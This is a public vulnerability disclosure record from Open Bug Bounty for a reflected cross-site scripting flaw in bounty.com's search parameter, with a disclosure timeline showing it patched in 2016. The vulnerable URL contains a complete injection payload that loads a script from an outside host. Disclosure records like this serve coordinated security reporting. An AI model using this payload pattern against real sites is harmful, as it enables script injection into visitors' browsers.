bounty.com XSS vulnerability

2015-08-21T17:02:00
ID OBB:80997
Type openbugbounty
Reporter CianLR
Modified 2016-01-30T22:12:00

Description

Vulnerable URL:
http://www.bounty.com/Search/All?SearchStr=9999%22%3E%3Cscript%20src=https://xssposed.org/1.js%3E
Details:

Description| Value
---|---
Patched:| Yes, at 30.01.2016
Latest check for patch:| 30.01.2016 22:12 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 32225
Google Pagerank| 4
VIP website status:| Yes
Check bounty.com SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 21 August, 2015 17:02 GMT
Vulnerability existence verified and confirmed| 21 August, 2015 17:04 GMT
Vulnerability patched by the website owner| 30 January, 2016 22:12 GMT